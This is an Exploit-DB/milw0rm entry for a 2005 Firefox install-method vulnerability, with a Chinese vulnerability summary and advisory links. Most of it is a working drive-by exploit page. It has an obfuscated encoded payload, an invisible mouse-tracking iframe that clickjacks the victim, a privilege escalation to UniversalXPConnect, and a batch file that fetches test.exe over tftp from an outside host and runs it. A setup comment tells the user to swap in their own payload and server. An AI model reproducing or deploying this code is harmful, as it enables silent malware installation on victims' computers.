https://www.exploit-db.com/exploits/986
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-935

MozillaFirefox是一款非常流行的开放源码WEB浏览器。MozillaFirefox在安装方式的实现上存在漏洞，可能导致无需用户交互就可执行任意代码。对漏洞的最初分析表明该漏洞可能导致迷惑浏览器状态栏信息，并允许任意脚本获得UniversalXPConnect权限。但据观察这个漏洞还可被远程利用，在有漏洞的计算机上以运行受影响浏览器用户的权限执行特权操作。

<!-- 
1) wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/986.js (05072005.js)
2) change src= below
3) edit index and change tftp location

/str0ke
-->

<html><head><title>hide me bitch</title>
	
	<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">


			<script language="javascript" src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/986.js"></script></head>


<body>


<script language="JavaScript"><!--
function Decode() {
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--nPAHSBMGH OQBuFFZQDCMGH(){nUFFHUIQ= HU9MOUBGD.UFFhUIQ;nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;nIULGD9QD = UFF9QDCMGH.CATCBDMHO(", #);nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;nDQBADH ";n}n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\'CBQUJSGGKMQC\'){8MHRG8.HUIQ=\'CBQUJSGGKMQC\';}  QJCQ{ Q9QHB={BUDOQB:{NDQP:\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-".z.v.#-P7+I5+BT.7FM\'}};MHCBUJJ(Q9QHB,\'WGA UDQ 9AJHQDUTJQ!!!\',\'LU9UCSDMFB:Q9UJ(\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\'2.SDQUBQmHCBUHSQ(");
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\'S:\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,"7"<|"7"w|"7]",<]",");GABFAB=\\\\\\\'BPBF -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\HSJC\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\");
d("\\\HRQJ %"\\\\\\\\HSJC\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\')\'); }')+'4/HGCSDMFB34U NDQP=\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]"&UFFJMSUBMGH=PMDQPG7\' CB6JQ=\'SADCGD:RQPUAJB;\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0"0 IUDOMH8MRBN=0"0 IUDOMHNQMONB="0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:"F7; 8MRBN:"F7; NQMONB:yF7; 8MRBN:yF7; IUDOMH:"F7; FURRMHO:"F7; -IG5-GFUSMB6:"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03nnRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB = (Q.FUOQX->)+0F70n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70n}   nn9UD SGAHBQD = ";    nPAHSBMGH JGURQD() {n    SGAHBQD++n    MP(SGAHBQD == #) {n        CBQUJSGGKMQC.PGSAC()n    } QJCQ MP(SGAHBQD == ]) {n        CBQUJSGGKMQC.NMCBGD6.OG(-#)n        //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;n    }n}nn4/CSDMFB34/TGR634");
d("/NBIJ3");
return 0;}
//--></script>
<script language="JavaScript"><!--
ky="";function d(msg){ky=ky+codeIt(key,msg);}var key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#"";function codeIt (mC, eS) {var wTG, mcH =  mC.length / 2, nS = "", dv;for (var x = 0; x < eS.length; x++) {wTG = mC.indexOf(eS.charAt(x));if (wTG > mcH) {dv = wTG - mcH;nS = nS + mC.charAt(33 - dv);}else {if (key.indexOf(eS.charAt(x)) < 0) {nS = nS + eS.charAt(x)}else {dv = mcH - wTG;nS = nS + mC.charAt(33 + dv);}}}return nS;}
//--></script><script language="JavaScript"><!--
Decode();document.write(ky);//--></script><script language="javascript"><!--
function getAppVersion(){
appname= navigator.appName;
appversion = navigator.appVersion;
majorver = appversion.substring(0, 1);
if ( (appname == "Netscape") && ( majorver >= 3 ) ) return 1;
if ( (appname == "Microsoft Internet Explorer") && (majorver >= 4) ) return 1;
return 0;
}
//--></script>i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!='stealcookies'){window.name='stealcookies';}  else{ event={target:{href:'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi'}};install(event,'You are vulnerable!!!','javascript:eval(\'netscape.security.PrivilegeManager.enablePrivilege(\\\'UniversalXPConnect\\\');file=Components.classes[\\\'@mozilla.org/file/local;1\\\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\'c:\\\\\\\\booom.bat\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\'@mozilla.org/network/file-output-stream;1\\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\\\'tftp -i ill[server]oab.zapto.org get test.exe c:\\\\\\\\test.exe\\\\ncls\\\\nstart c:\\\\\\\\test.exe\\\\ndel %0\\\\ncls\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\')'); }')+'</noscript><a href='https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox' style='cursor:default;'>   </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position: absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe><script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}   

var counter = 0;    
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display="none";
    }
}

</script>
<script language="javascript">postamble();</script>
</body></html>

# milw0rm.com [2005-05-07]

来源:US-CERT
名称:VU#534710
链接:http://www.kb.cert.org/vuls/id/534710
来源:VUPEN
名称:ADV-2005-0493
链接:http://www.frsirt.com/english/advisories/2005/0493
来源:SECUNIA
名称:15292
链接:http://secunia.com/advisories/15292
来源:MISC
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=293302
来源:MISC
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=292691
来源:XF
名称:mozilla-javascript-code-execution(20443)
链接:http://xforce.iss.net/xforce/xfdb/20443
来源:BID
名称:13544
链接:http://www.securityfocus.com/bid/13544
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/mfsa2005-42.html
来源:SECTRACK
名称:1013913
链接:http://securitytracker.com/id?1013913
来源:MISC
链接:http://greyhatsecurity.org/vulntests/ffrc.htm
来源:MISC
链接:http://greyhatsecurity.org/firefox.htm
来源:BID
名称:15495
链接:http://www.securityfocus.com/bid/15495
来源:REDHAT
名称:RHSA-2005:435
链接:http://www.redhat.com/support/errata/RHSA-2005-435.html
来源:REDHAT
名称:RHSA-2005:434
链接:http://www.redhat.com/support/errata/RHSA-2005-434.html
来源:FULLDISC
名称:20050508FirefoxRemoteC